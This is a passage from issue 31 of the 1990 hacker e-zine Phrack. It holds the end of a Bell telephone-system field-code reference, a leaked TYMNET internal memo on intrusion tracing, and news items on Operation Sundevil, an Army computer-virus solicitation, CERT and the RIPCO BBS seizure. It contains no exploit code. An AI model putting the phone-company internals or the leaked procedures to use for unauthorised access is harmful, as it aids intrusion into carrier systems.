  2284.      G=Complex Service (Direct Inward Dialing, Radio Common Carrier, etc)
  2285.      O=Official
  2286.      Q=Centrex
  2287.      X=POTx Non-hunting
  2288. TTA  Terminating Traffic Area
  2289.      TTA XXX
  2290.      XXX=Maximum of 3 Alphanumeric Characters
  2291. TYP  Switching Type
  2292.      TYP XXX
  2293.      1ES=Number 1ESS
  2294.      2ES=Number 2ESS
  2295.      3ES=Number 3ESS
  2296.      5ES=Number 5ESS
  2297.      RSS=Remote Switching System
  2298.      1XB=Number 1 Cross-bar
  2299.      5XB=Number 5 Cross-bar
  2300.      SXS=Step-by-step
  2301.      DMX=DMS-10
  2302.      DMC=DMS-100
  2303. US   USOC
  2304.      US XXXXX
  2305.      XXXXX=Maximum of 5 Alphanumeric Characters
  2306. USE  Entity Usage
  2307.      USE X
  2308.      G=Growth
  2309.      S=Stable
  2310. VAL  Minimum Valid Hours for Entity Data
  2311.      VAL XX
  2312.      XX=1-99
  2313. WC   Wire Center
  2314.      WC XX
  2315.      XX=Alphanumeric
  2316. WL   Work Location
  2317.      WL Y
  2318.      Y=1-8    or
  2319.      WL XXX
  2320.      ADM=Administrative
  2321.      ACT=Assignment Change Ticket
  2322.      CPC=Special Service Circuits
  2323.      MCT=Maintenance Change Tickets
  2324. WPN  Work Package Number
  2325.      WPN XXXX
  2326.      XXXX=1-9999
  2327. WPT  Work Package Type
  2328.      WPT XXX
  2329.      XXX=Maximum of 3 Alphanumeric Characters
  2330. XN   "X" Number
  2331.      XN XXX-YYXX  or
  2332.      XN XXX-YXX
  2333.      X=Numeric
  2334.      Y=Alphanumeric
  2335. ZN   Zone Location
  2336.      ZN XXX
  2337.      XXX=001-999
  2338. =============================================================================
  2339. ACKNOWLEDGEMENTS
  2340. Skinny Puppy for refreshing my memory
  2341. The Urvile for the "$*" file and further usage of echo
  2342. Bell Laboratories OPA-1Y600-01
  2343.  
  2344. _______________________________________________________________________________
  2345.                                  ==Phrack Inc.==
  2346.                   Volume Three, Issue Thirty-one, Phile #7 of 10
  2347.                               COMPANY CONFIDENTIAL
  2348.                                INTERIM MEMORANDUM
  2349.  
  2350.               SUBJECT:  TYMNET SUPPORT FOR CUSTOMER'S DATA SECURITY
  2351.        PURPOSE:  This document provides background, and general procedures
  2352.        and practices used to support customers with suspected security
  2353.        problems.  Field Sales is the intended audience but is a general
  2354.        document and may be useful to other customer support personnel.
  2355.        Currently, this document is in a final review.  Meanwhile, it is to
  2356.        retain the status of an internal proprietary document.
  2357.        BACKGROUND:  BT Tymnet Inc, and its Network Systems Company,
  2358.        believe information integrity is vital to ourselves and our
  2359.        customers.  One way TYMNET insures integrity is by providing good
  2360.        security.  TYMNET has a baseline security of user name, password,
  2361.        and user access profile available for all customers.  Further, there
  2362.        are two security products.  One permits the customer to limit
  2363.        password life (password automatically expires after a customer
  2364.        elected time period) and the other permits the end user to change
  2365.        his/her own password.  Since we do consider security a key issue,
  2366.        we continue to develop other security features.  Also, we work with
  2367.        Security vendors to certify their security products on our network,
  2368.        thus permitting customers to add such products, should they so
  2369.        desire.
  2370.        We have established Network Systems Company Policies which provide
  2371.        a framework for the information contained herein (see NSC Policy
  2372.        121 and 122.  More policies are in distribution as of this
  2373.        writing).  It is highly recommended that these policies be reviewed
  2374.        since they represent the framework of this document.
  2375.        Legal considerations are another key issue in any security case.
  2376.        Support, other then providing the customer with related security
  2377.        data, can only occur if law(s) have been broken.  The
  2378.        legal issues are complex and only a minimal information is
  2379.        provided herein.  At at the heart of this issue is the fact that
  2380.        the customer is the injured party, not TYMNET.  Patience and good
  2381.        communication may be required to get the customer to understand
  2382.        this fact.  The customers must act for themselves to obtain
  2383.        law enforcement support.  TYMNET will support that activity, and
  2384.        help to the degree possible, much as a "friend of the court".
  2385.        THE SUPPORT:  We provide security support as a responsible
  2386.        network service provider.  The first step in that support is for
  2387.        the field sales representative to act as a security consultant to
  2388.        the customer, at least to the extent explained below.
  2389.        The customer is well advised to plan in advance "what to do
  2390.        when Captain Midnight strikes" -- contingency planning, pure
  2391.        simple.  First there are two basic alternatives to choose from:
  2392.                               PROTECT AND PROCEED
  2393.                                        OR
  2394.                               PURSUE AND PROSECUTE
  2395.        "Protect and proceed" means 1) determine how the incident
  2396.        occurred, 2) plug the security leak/hole, and 3) go on with
  2397.        business as normal.
  2398.        (Do we want written notification of the Intent to "Pusue and
  2399.        Prosecute" from the "Injured Party?").
  2400.        "Pursue and prosecute" is just that.  The first step is having
  2401.        the customer obtain legal support, and both we and the customer
  2402.        continue to gather evidence until the suspect is apprehended.  The
  2403.        next step is the prosecution in a court of law.  (The final step is
  2404.        to return to the first alternative, e.g., now protect and
  2405.        proceed.)
  2406.        The customer needs to judge each case  on its own merits, but
  2407.        generally the first choice is the wiser one.  The second choice
  2408.        involves considerable effort, mostly by the customer and law
  2409.        enforcement agency(s), possible negative publicity for the
  2410.        customer and does not necessarily result in successful prosecution.
  2411.        Good contingency planning also includes becoming familiar with the
  2412.        laws and the local law enforcement people.
  2413.        The starting point is a suspected incident.  Herein, we will address
  2414.        the case where the customer has identified a suspected intruder.
  2415.        Generally, that occurs by a customer's detailed review of billing
  2416.        or host based security exception reports.
  2417.        At this point it is essential the field sales representative open a
  2418.        ticket containing at least the following:  1) customer name and CID,
  2419.        2) host(s) involved, 3) incident start and stop times, and 4) the
  2420.        customer's objective.  Add any other information deemed helpful.
  2421.        Other support may be an on-line trace of the call, if the
  2422.        suspect is currently on-line.  Field support should do this trace, or
  2423.        alternately, this same help can be obtained by calling network
  2424.        customer support and/or NetCon.  In any case it must be done while
  2425.        the suspect is on-line.  Such trace information should be
  2426.        included on the ticket.
  2427.        Based on the customer's position; the case will fit either
  2428.        "prevent and proceed" or, "pursue and prosecute".  The former is
  2429.        straight forward, in that TYMNET security will research the
  2430.        incidents(s), and provide data (generally user name and point of
  2431.        origin(s) to the customer via Field Sales, with recommendations
  2432.        on how to prevent any further occurrence.  We do provide this
  2433.        service as a responsible vendor, although strict interpretation
  2434.        of NSC policy 121 precludes it.  However, we do apply the policy if
  2435.        a customer continues to ask for data without taking preventative
  2436.        action.
  2437.        The "pursue and prosecute" case is complex, and is different for each
  2438.        situation.  It will be explained by using a typical scenario.  After
  2439.        the first step (as above), it is necessary to gather data sufficient
  2440.        to show a pattern of intrusion from a single TYMNET access point.
  2441.        With this information, the customer (the injured party) must contacts
  2442.        law enforcement agency(s), with the one exception noted below.
  2443.        If that intrusion point is through a gateway from a foreign
  2444.        country, for all practical purposes, the customer can do little to
  2445.        prosecute.  The law(s) of the foreign country will apply since
  2446.        extradition is most unlikely.  Therefore, action will have to be
  2447.        have to be initiated by the network service provider in the
  2448.        foreign country.  In this case, TYMNET security will have MIS
  2449.        research the session details to obtain the Network User
  2450.        Identifier, and External Network Support (Jeff Oliveto's
  2451.        organization) will communicate that information to the foreign
  2452.        network for their action (cases involving U.S. government computers
  2453.        may get special treatment - see for example - Communications of the
  2454.        ACM, May, 1988, article on "Stalking the Wiley Hacker").
  2455.        Most all security incidents on our network are caused by international
  2456.        hackers using X.121 addressing.  Frequently, our customer is unaware
  2457.        of the risk of X.121 addressing, and permits it.  BE SURE YOUR
  2458.        CUSTOMERS KNOW THAT THEY CAN CHOOSE FULL TYMNET SECURITY FEATURES,
  2459.        THEREBY PRECLUDING SUCH INTRUSIONS FROM X.121 ADDRESSING FROM
  2460.        FOREIGN NETWORKS.
  2461.        For the domestic case, the customer gets law enforcement (attorney
  2462.        general at incoming call location, secret service if credit card
  2463.        fraud is involved, or possibly the FBI, depending on the incident)
  2464.        to open a case.  Note, damage in estimated dollars is usually
  2465.        necessary to open a case, and many agencies will not take action on
  2466.        small claims.  For example, as of December, 1988, the Los Angeles
  2467.        Attorney will not open a case for less than $10,000 (they have too
  2468.        big a caseload at higher damages).
  2469.        Assuming legal support is provided, a court order for a wire tap
  2470.        and trace will be obtained, thereby determining the caller's phone
  2471.        number (this step can be very involved and time consuming for long
  2472.        distance calls).  The next legal action occurs after the calling
  2473.        number is identified.  A search warrant is obtained for searching the
  2474.        facility housing the phone location.  Normally, this search will
  2475.        gather evidence sufficient for prosecution.  Evidence is typically
  2476.        the necessary terminal equipment, printouts, diskettes, etc.  Then,
  2477.        at long last the prosecution.  Also note, again at the time the
  2478.        calling number is identified, the injured party should use the
  2479.        "protect and proceed" plan.
  2480.        For further information, contact Data Security, TYMNET Validations,
  2481.        or Ontyme NSC.SECURITY.
  2482.  
  2483. _______________________________________________________________________________
  2484.                               ==Phrack Inc.==
  2485.                Volume Three, Issue Thirty-one, Phile #8 or 10
  2486.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2487.             PWN              Phrack World News              PWN
  2488.             PWN             Issue XXXI, Part One            PWN
  2489.             PWN         Compiled by Phreak_Accident         PWN
  2490.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2491.  
  2492.  
  2493. Operation "Sun-Devil"
  2494. =====================
  2495.      May 9th and 10th brought on two day thats would be marked in every hackers
  2496. history book.  The reason we assume these days will be important to many, is
  2497. that maybe it's time we opened are eyes and saw the witch hunt currently in
  2498. progress.
  2499.      In less than 48 hours, 150 Secret Service men and other law officials
  2500. served 30 search warrents in 14 cities around the nation (This thing was hudge).
  2501.      Operation "Sun-Devil" (As the Attorney General in Phoenix called it), was
  2502. a success on their part. "The investigation though is not over,  and there are
  2503. more warrents to be executed.", said Jim Folwer of L.A's Secret Service.
  2504.      Any details of the investigation are not being given out at this time.
  2505. The Asst. Attorney General of Pheonix told Phrack Inc. that there were other
  2506. problems involving the investigation and that it was an ongoing investigation
  2507. for the last TWO years.
  2508.      It is my understanding that Gail Thackeray and the Secret Service are not,
  2509. taking this lightly.  She told Phrack inc. that they are not distinquishing
  2510. pirates, hackers, or phreakers.  Basically, it's any kid with a modem that calls
  2511. a BBS with an alias.  Yes, we are the witches, and we are being
  2512. hunted.
  2513.      The following are Two news releases obtianed via fax through the U.S.
  2514. Secret Service for Phrack Inc.
  2515.  
  2516.                   N E W S     R E L E A S E
  2517. FOR IMMEDIATE RELEASE             CONTACT:  Gail Thackeray
  2518. ------------------------          Assitant Attorney General
  2519. May 9, 1990 @ 11:00 A.M.          (602) 542-4266
  2520.  
  2521.      Attorney General Bob Corbin announced today that in
  2522. connection with an eighteen-month joint investigation into
  2523. computer crime conducted with the United States Secret
  2524. Service and the United States Attorney's office, the Arizona
  2525. Attorney General's office has executed seven search warrants
  2526. in which computers, electronic bulletin boards, telephone
  2527. test equipment and records have been seized.
  2528.      The Organized Crime and Racketeering Division
  2529. investigation involved complaints by Arizona and out of state
  2530. victims of substantial financial losses resulting from credit
  2531. card fraud and theft of long distance telephone and data
  2532. communications services, and by victims of attacks on
  2533. computer systems operated by government agencies, private
  2534. corporations, telephone companies, financial institutions,
  2535. credit bureaus, and a hospital.
  2536.      The Arizona Attorney General's office received
  2537. information and technical assistance from the Glendale,
  2538. Arizona Police Department's Computer Crime Unit, and from
  2539. many private sector sources, including Bellcore (Bell
  2540. Communications Research), American Express, Communications
  2541. carriers U.S. Sprint, AT&T, MCI, Com Systems, MidAmerican
  2542. Communications, LDL Communications, and Shared Use Network.
  2543. Without the cooperation of these companies and of numerous
  2544. federal, state and local law enforcement agencies around the
  2545. country, this investigation would have been impossible.
  2546.      The privacy of our citizens and the health of our
  2547. economy depend upon secure, reliable computer systems.
  2548. Computer fraud and attempts to compromise senstitive public
  2549. and private computer systems will not be tolerated.
  2550. Individuals who commit these offenses in Arizona can expect
  2551. to be prosecuted.
  2552.  
  2553. .end.
  2554.                  P R E S S     R E L E A S E
  2555. FOR IMMEDIATE RELEASE        Contact:  Wendy Harnagel
  2556. Wednesday, May 9, 1990       United States Attorney's Office
  2557. ----------------------       (602) 379-3011
  2558.      PHOENIX -- Stephen M. McNamee, United States Attorney
  2559. District of Arizona, Robert K. Corbin, Attorney General for
  2560. the State of Arizona, and Henry R. Potosky, Acting Special
  2561. Agent in Charge of the United States Secret Service Office in
  2562. Phoenix, today announced that approximately twenty-seven
  2563. search warrants were executed on Monday and Tuesday, May 7
  2564. and 8, 1990, in various cities across the nation by 150
  2565. Secret Service agents along with state and local law
  2566. enforcement officials.  The warrants were issued as a part of
  2567. Operation Sundevil, which was a two year investigation into
  2568. alleged illegal computer hacking activities.
  2569.      The United States Secret Service, in cooperation with
  2570. the United States Attorney's Office, and the Attorney General
  2571. for the State of Arizona, established an operation utilizing
  2572. sophisticated investigative techniques, targeting computer
  2573. hackers who were alleged to have trafficked in and abuse
  2574. stolen credit card numbers, unauthorized long distance
  2575. dialing codes, and who conduct unauthorized access and damage
  2576. to computers.  While the total amount of losses cannot be
  2577. calculated at this time, it is estimated that the losses may
  2578. run into the millions of dollars.  For example, the
  2579. unauthorized accessing of long distance telephone credit
  2580. cards have resulted in uncollectible charges.  The same is
  2581. true of the use of stolen credit card numbers.  Individuals
  2582. are able to utilize the charge accounts to purchase items for
  2583. which no payment is made.
  2584.      Federal search warrants were executed in the following
  2585. cities:
  2586.  
  2587.      Chicago, IL
  2588.      Cincinatti, OH
  2589.      Detroit, MI
  2590.      Los Angeles, CA
  2591.      Miami, FL
  2592.      Newark, NJ
  2593.      New York, NY
  2594.      Phoenix, AZ
  2595.      Pittsburgh, PA
  2596.      Plano, TX
  2597.      Richmond, VA
  2598.      San Diego, CA
  2599.      San Jose, CA
  2600.      Unlawful computer hacking imperils the health and
  2601. welfare of individuals, corporations and government agencies
  2602. in the United States who rely on computers and telephones to
  2603. communicate.
  2604.      Technical and expert assistance was provided to the
  2605. United States Secret Service by telecommunication companies
  2606. including Pac Bel, AT&T, Bellcore, Bell South, MCI, U.S.
  2607. Sprint, Mid-American, Southwestern Bell, NYNEX, U.S. West,
  2608. and by the many corporate victims.  All are to be commended
  2609. for their efforts for their efforts in researching intrusions
  2610. and documenting losses.
  2611.      McNamee and Corbin expressed concern that the improper
  2612. and alleged illegal use of computers may become the White
  2613. Collar crime of the 1990's.  McNamee and Corbin reiterated
  2614. that the state and federal government will vigorously pursue
  2615. criminal violations of statutes under their jurisdiction.
  2616. Three individuals were arrested yesterday in other
  2617. jurisdictions on collateral or independent state charges.
  2618. The investigations surrounding the activities of Operation
  2619. Sundevil are continuing.
  2620.      The investigations are being conducted by agents of the
  2621. United States Secret Service and Assistant United States
  2622. Attoryney Tim Holtzen, District of Arizona, and Assistant
  2623. Arizona Attorney General Gail Thackery.
  2624.  
  2625. .end.
  2626. _______________________________________________________________________________
  2627. Virus mania
  2628. ===========
  2629.      Robert T. Morris started it all.  Who cares, it's over and done with.
  2630. Never the less, it's being dragged out in every national paper.  It's old news
  2631. so we won't cover it here, but we will tell you about something the Army has up
  2632. its sleeve.
  2633.                     Army is Looking for a Few Good Viruses
  2634.                              By Rory J. O'conner
  2635.                            Knight-Ridder Newspapers
  2636.                     ______________________________________
  2637.      The U.S. Army is looking for help to develop the seeds of a new-age germ
  2638. warfare: It wants business to help it turn computer "viruses" into military
  2639. weapons.
  2640.      Experts predict the viruses, if sucessfully developed, could be used to
  2641. wreak havoc on the increasing number of computers in the battlefield.  The
  2642. destructive computer programs which have increasingly damaged commercial and
  2643. research computer systems in the past four years, could be used to disrupt
  2644. military communications and feed misleading data to enemy commanders.
  2645.      The viruses could aslo be used to alter the programming of crucial
  2646. communications satellites serving combat units, the experts said.
  2647.      The Army is soliciting bids from small businesses to determine the
  2648. feasibility of using computer viruses in warefare.  And it is willing to pay up
  2649. to $550,000 to a company that comes up with a plan for creating the programs -
  2650. and figures out how to use military radio systems to introduce them into enemy
  2651. computers.
  2652.      A computer virus is a kind of program designed to disrupt normal operation
  2653. of a computer system or damage data ont hat system by altering or destroying
  2654. it.  The rogue programs are most effective when introduced secretly into the
  2655. computer system of an unsuspecting user and when their damage is subtle or
  2656. hidden fromt he user for some time.
  2657.      Viruses are also self-duplicating and can spread undetected from an
  2658. infected computer to other computer systems they contact.
  2659.      So far, more than 60 computer viruses have been identified, most of them
  2660. attacking poorly guarded personal computers used by businesses, universities
  2661. and inividuals.  The Army's virus would have to be more sophisticated than
  2662. those programs.
  2663.      But some detractors of the concept say the Army could wind up with the
  2664. same problem it has with biological weapons:  Creating destructive elements
  2665. that might get loose and cause widespread damage to its own forces as well as
  2666. civilians.
  2667.      "This stuff is very dangerous, and most people involved in creating
  2668. viruses are not aware of the threat," said a Bay Area virus expert who asked ot
  2669. to be named.  "You can't spread anthrax around the world and not have it come
  2670. back around to you.  And the enemy is using the same kind of computers and
  2671. software that we are."
  2672.       Many experts who are fighting the explosion in virus activity by amateur
  2673. programmers are especially angry at government efforts to develop the programs
  2674. for the military.  Some say it is particulary troubling in light of the
  2675. sentencing of Robert T. Morris Jr. (Ed -Ick), convicted in federal court of
  2676. sending a similar program through a government sponsored network in 1988.
  2677.       "It bothers me that the government says in one breath (viruses) are bad
  2678. and illegal and then asks for someone to develop them," said Glenn Tenney, a
  2679. San Mateco, Calif., programmer and organizer of the annual Computer Hackers
  2680. Conference.  "If Morris had done the same thing for the Army, they'd have paid
  2681. him hundreds of thousands to do it.  But he did it on the wrong side and got
  2682. punished."
  2683.        Computer experts say creating a virus to the Army's specifications is
  2684. possible with current technology - although some of the Army's requirements
  2685. could make developing it more difficult than creating an ordinary personal
  2686. computer virus.
  2687.        First, military computer systems are usually designed with far more
  2688. security features than commercial systems, making it much harder for a virus to
  2689. enter the systems.  Second, the Army is emphasizings the use of radio
  2690. communication to inject the virus into enemy systems.  Normally, computer
  2691. viruses spread through the exchange of floppy disks that contain the rogue
  2692. program or along wires connecting several computers.  Using complex military
  2693. radio signals instead would require expertise that mose programmers don't have.
  2694. .end
  2695. _______________________________________________________________________________
  2696. RIPCO    May 8th, 1990
  2697. -----    -------------
  2698.      Operation Sun-Devil claimed more than just a few "Codelords" around the
  2699. states, it claimed one of the oldest and more popular boards.  Nobody knows
  2700. when or if RIPCO shall return.
  2701.      Reportedly, Dr. Ripco was charge on a hand-gun violation after his house
  2702. was searched.  Phrack inc. can't comment on this.
  2703.      The following is the exact transcript of the message left on RIPCO's
  2704. answering maching after Operation Sun-Devil.
  2705. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2706. This is 528-5020.
  2707. As you are probably aware, on May 8, the Secret Service conducted a series
  2708. of raids across the country.  Early news reports indicate these raids
  2709. involved people and computers that could be connected with credit card and
  2710. long distance toll fraud. Although no arrests or charges were made, Ripco
  2711. BBS was confiscated on that morning.  It's involvement at this time is
  2712. unknown. Since it is unlikely that the system will ever return, I'd just l
  2713. say goodbye, and thanks for your support for the last six and a half years.
  2714. It's been interesting, to say the least.
  2715. Talk to ya later.
  2716.   {Dr. Ricpo}
  2717.                        *** END OF VOICE MESSAGE ***
  2718. _______________________________________________________________________________
  2719.  
  2720.                                ==Phrack Inc.==
  2721.                  Volume Three, Issue Thirty-one, Phile #9 of 10
  2722.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2723.               PWN             Phrack World News               PWN
  2724.               PWN            Issue XXXI, Part Two             PWN
  2725.               PWN        Compiled by Phreak_Accident          PWN
  2726.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2727.  
  2728.  
  2729. {C}omputer {E}mergency {R}esponse {T}eam
  2730. ----------------------------------------
  2731.      Some call it "Internet Police" -- Others call it "just stupid."
  2732. CERT however is a mix.  But I do give them credit -- After all, have your
  2733. number one goal being 'making the Internet more secure' has to be a tough task.
  2734. Therefore, we give them credit.
  2735.      However, CERT is funded by DARPA, which is a government agency.  And
  2736. anything in my book that the government runs is bad news.  Yes, the government
  2737. pays the 6 man salary and keep their hot-line active 24 hours a day.
  2738.      Ahh..  What do you know about CERT?  "Nothing" you say?  Well, the
  2739. following is the press release and other reprints of information about CERT.
  2740. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2741.  
  2742. Richard Pethia <rdp@SEI.CMU.EDU>
  2743. DEAR XXXXXXXXX,
  2744. I have been reviewing our correspondence files and have discovered
  2745. that your request for information may not have been filled.  I
  2746. apologize for the delay and hope that the information is still useful
  2747. to you.  If, after reading the following, you have additional
  2748. questions or would like to subscribe to one of our information lists,
  2749. please send email with your question/request.
  2750. The Computer Emergency Response Team (CERT) was established by the Defense
  2751. Advanced Research Projects Agency in November of 1988 to serve members
  2752. of the Internet Research community.  The press release below describes
  2753. the general role of the CERT.
  2754. More specifically, the CERT supports individual Internet sites by:
  2755.  -Working with site personnel to help resolve individual computer security
  2756.   incidents.  Contact potentially affected sites to warn them of
  2757.   possible security breaches.  Work with sites to change the
  2758.   conditions that allowed incidents to occur.
  2759.  -Issuing advisories that alert the community to specific system
  2760.   vulnerabilities or intrusion techniques, as well as the methods to
  2761.   protect against them.
  2762.  -Working with the community and system (primarily Unix) vendors to
  2763.   reslove specific system vulnerabilities.
  2764.  -Maintaining and operating moderated mailing lists that: (1) provide a
  2765.   discussion forum for tools and techniques to improve the security of
  2766.   Unix systems, and (2) provide a discussion forum and alert mechanism
  2767.   for PC viruses, trojan horses, etc.
  2768. Over the past year we have developed hundreds of working relationships
  2769. with members of the Internet and other communities and have
  2770. established an extensive information collection and dissemination
  2771. network.  Because of this network of cooperating individuals and
  2772. organizations, we are often able to advise the community of problems
  2773. allowing them to take corrective action before being affeceted by
  2774. those problems.
  2775. ---------------------
  2776.                                                 No.  597-88
  2777.                                                 (202) 695-0192 (Info.)
  2778.                                                 (202) 697-3189 (Copies)
  2779. IMMEDIATE RELEASE       December 6, 1988        (202) 697-5737
  2780. (Public/Industry)
  2781.         DARPA ESTABLISHES COMPUTER EMERGENCY RESPONSE TEAM
  2782. The Defense Advanced Research Projects Agency (DARPA) announced today
  2783. that it has established a Computer Emergency Response Team (CERT) to
  2784. address computer security concerns of research users of the Internet,
  2785. which includes ARPANET.  The Coordination Center for the CERT is
  2786. located at the Software Engineering Institute (SEI), Carnegie Mellon
  2787. University, Pittsburgh, PA.
  2788. In providing direct service to the Internet community, the CERT will
  2789. focus on the special needs of the research community and serve as a
  2790. prototype for similar operations in other computer communities.  The
  2791. National Computer Security Center and the National Institute of
  2792. Standards and Technology will have a leading role in coordinating the
  2793. creation of these emergency response activities.
  2794. The CERT is intended to respond to computer security threats such as
  2795. the recent self-replicating computer program ("computer virus") that
  2796. invaded many defense and research computers.
  2797. The CERT will assist the research network communities in responding to
  2798. emergency situations.  It will have the capability to rapidly
  2799. establish communications with experts working to solve the problems,
  2800. with the affected computer users and with government authorities as
  2801. appropriate.  Specific responses will be taken in accordance with
  2802. DARPA policies.
  2803. It will also serve as a focal point for the research community for
  2804. identification and repair of security vulnerabilities, informal
  2805. assessment of existing systems in the research community, improvement
  2806. to emergency response capability, and user security awareness.  An
  2807. important element of this function is the development of a network of
  2808. key points of contact, including technical experts, site managers,
  2809. government action officers, industry contacts, executive level
  2810. decision-makers and investigative agencies, where appropriate.
  2811. Because of the many network, computer, and systems architectures and
  2812. their associated vulnerabilities, no single organization can be
  2813. expected to maintain an in-house expertise to respond on its own to
  2814. computer security threats, particularly those that arise in the
  2815. research community.  As with biological viruses, the solutions must
  2816. come from an organized community response of experts.  The role of the
  2817. CERT Coordination Center at the SEI is to provide the supporting
  2818. mechanisms and to coordinate the activities of experts in DARPA and
  2819. associated communities.
  2820. The SEI has close ties to the Department of Defense, to defense and
  2821. commercial industry, and to the research community.  These ties place
  2822. the SEI in a unique position to provide coordination support to the
  2823. software experts in research laboratories and in industry who will be
  2824. responding in emergencies and to the communities of potentially
  2825. affected users.
  2826. The SEI is a federally-funded research and development center,
  2827. operating under DARPA sponsorship with the Air Force Systems Command
  2828. (Electronic Systems Division) serving as executive agent.  Its goal is
  2829. to accelerate the transition of software technology to defense
  2830. systems.  Computer security is primarily a software problem, and the
  2831. presence of CERT at the SEI will enhance the technology transfer
  2832. mission of the SEI in security-related areas.
  2833.                                         -END-
  2834.  
  2835. QUESTIONS AND ANSWERS:  DARPA ESTABLISHES CERT, 12/6/88
  2836. Q: Can you provide background on earlier break-ins?
  2837. A: On November 2, 1988, thousands of computers connected to
  2838. unclassified DoD computer networks were attacked by a virus.  Although
  2839. the virus did not damage or compromise data, it did have the effect of
  2840. denying service to thousands of computer users.  The computer science
  2841. research community associated with the Defense Advanced Research
  2842. Projects Agency (DARPA), along with many other research laboratories
  2843. and military sites that use these networks, quickly responded to this
  2844. threat.  They developed mechanisms to eliminate the infection, to
  2845. block the spread of the self-replicating program, and to immunize
  2846. against further attack by similar viruses.  Software experts from the
  2847. University of California at Berkeley, with important contributions
  2848. from the Massachusetts Institute of Technology and other network
  2849. sites, rapidly analyzed the virus and developed immunization
  2850. techniques.  These same software experts also provided important
  2851. assistance in the more recent Internet intrusion of 27-28 November.
  2852. As the events unfolded, DARPA established an ad hoc operation center
  2853. to help coordinate the activities of software experts working around
  2854. the clock and to provide information to appropriate government
  2855. officials.  The operations center had three main tasks.  It
  2856. facilitated communications among the many groups affected, it ensured
  2857. that government organizations were promptly informed of developments,
  2858. and it provided initial technical analysis in DoD.  Although the
  2859. threat was contained quickly, a more maliciously designed virus could
  2860. have done serious damage.
  2861. The recent events serve as a warning that our necessarily increasing
  2862. reliance on computers and networks, while providing important new
  2863. capabilities, also creates new kinds of vulnerabilities.  The
  2864. Department of Defense considers this an important national issue that
  2865. is of major concern in both the defense and commercial sectors.  The
  2866. DoD is developing a technology and policy response that will help
  2867. reduce risk and provide an emergency reaction response.
  2868. Q: Who will be on the CERT?
  2869. A: The CERT will be a team of over 100 experts located throughout the
  2870. U.S.  whose expertise and knowledge will be called upon when needed.
  2871. When not being called upon, they will continue their normal daily
  2872. work.  As noted in the release, these experts will include: technical
  2873. experts, site managers, government action officers, industry contacts,
  2874. executive-level decision-makers and representatives from investigative
  2875. agencies.
  2876. recommendations that will be acted upon by DoD authorities.
  2877. Q: Is the CERT fully operational now?
  2878. A: We are in the very early stages of gathering people for the CERT.
  2879. We are first concentrating on collecting technical experts.  A staff
  2880. is in place at SEI, but details are still being worked out.
  2881. Q: Will there just be one CERT?
  2882. A: The intent is that each major computer community may decide to
  2883. establish its own CERT.  Each CERT will therefore serve only a
  2884. particular community and have a particular technical expertise.  (The
  2885. DARPA/SEI CERT will serve, for example, the research community and
  2886. have expertise in Berkeley-derived UNIX systems and other systems as
  2887. appropriate.)  The National Computer Security Center and the National
  2888. Institute of Standards and Technology will support the establishment
  2889. of the CERTs and coordinate among them.
  2890. Q: What are the special needs of the research community that their
  2891. CERT will serve?
  2892. A: The special challenge of the research community is improving the
  2893. level of computer security without inhibiting the innovation of
  2894. computer technology.  In addition, as is often DARPA's role, their
  2895. CERT will serve as a prototype to explore the CERT concept so that
  2896. other groups can learn and establish their own.
  2897. Q: Does the CERT Coordination Center have a press point of contact?
  2898. A: No.  Their function is to serve as a nerve center for the user
  2899. community.
  2900. .end
  2901. _______________________________________________________________________________
  2902. USA Today and the devil
  2903. -----------------------
  2904.      Many controversies have been made of the article printed in USA Today
  2905. after Operation Sun-Devil took it's toll.
  2906.      Phrack inc. tried to contact the author, and with no luck she wasn't
  2907. accepting phone calls.  Please remember, this is only a USA Today article --
  2908. C'mon, get real USAT.
  2909. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2910.  
  2911.  
  2912. byline 'Debbie Howlett, USA Today' reads:
  2913. A network of computer hackers operating in 14 cities -- which bilked phone
  2914. companies of $50 million -- has been unplugged, police say.
  2915. "We're not talking about somebody who played Space Invaders too many
  2916. times," says Tim Holtzen, spokesman for the U.S. attorney in Phoenix.
  2917. The hackers -- the largest such ring discovered in the USA --broke into
  2918. phone company and bank computer systems to obtain account numbers and run
  2919. up an unknown total in debts, police say.
  2920. "The main thing is the life-threatening information these computer hackers
  2921. were trying to get into," says Richard Adams of the Secret Service.  "It
  2922. goes beyond being monetary to totally mischievous."
  2923. The ring was uncovered 18 months ago, when members tried and failed to
  2924. infiltrate computers at Barrows Neurological Institute in Phoenix.
  2925. They later tried to block incoming calls to the 911 emergency service in
  2926. Chicago.  The motivation?  "The primary reason is as kind of a malicious
  2927. hobby." says Gary Chapman of Computer Professionals for Social
  2928. Responsibility.  "People are interested in testing their skills against
  2929. security measures." But, Adams says, "I hate to minimize it by saying it
  2930. was just for kicks."
  2931. Police seized 40 computers and 23,000 disks during searches Tuesday in 14
  2932. cities, officials said Wednesday.  Five men, between the ages of 19 and 24,
  2933. have been arrested.
  2934. What's been uncovered so far, says Holtzen, may be "just the tip of the
  2935. iceberg."
  2936.                               [END OF STORY]
  2937. _______________________________________________________________________________
  2938.  
  2939.                               ==Phrack Inc.==
  2940.                Volume Three, Issue Thirty-one, Phile #10 of 10
  2941.              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2942.              PWN             Phrack World News               PWN
  2943.              PWN           Issue XXXI, Part Three            PWN
  2944.              PWN        Compiled by Phreak_Accident          PWN
  2945.              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2946.  
  2947. Comp.dcom.telecom
  2948. -----------------
  2949.      The following is excerpts from comp.dcom.telecom regard the now "Infamous"
  2950. Legion Of Doom busts.  I know most of you have seen some of these
  2951. somewhere-sometime, but I thought I would try to get these out for those
  2952. unfortunate souls that don't have Usenet access.
  2953.      I know there have been many controversies over the following material and
  2954. the busts as a whole -- Henceforth, Phrack Inc. will not comment on any of such
  2955. busts.  Mainly because we don't want to jeopardize any current investigations
  2956. concerning LOD and others.  Leave it alone.  It's old news.  Let this sum it up
  2957. for you guys and then forget about it.
  2958. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2959.  
  2960. Newsgroups: comp.dcom.telecom
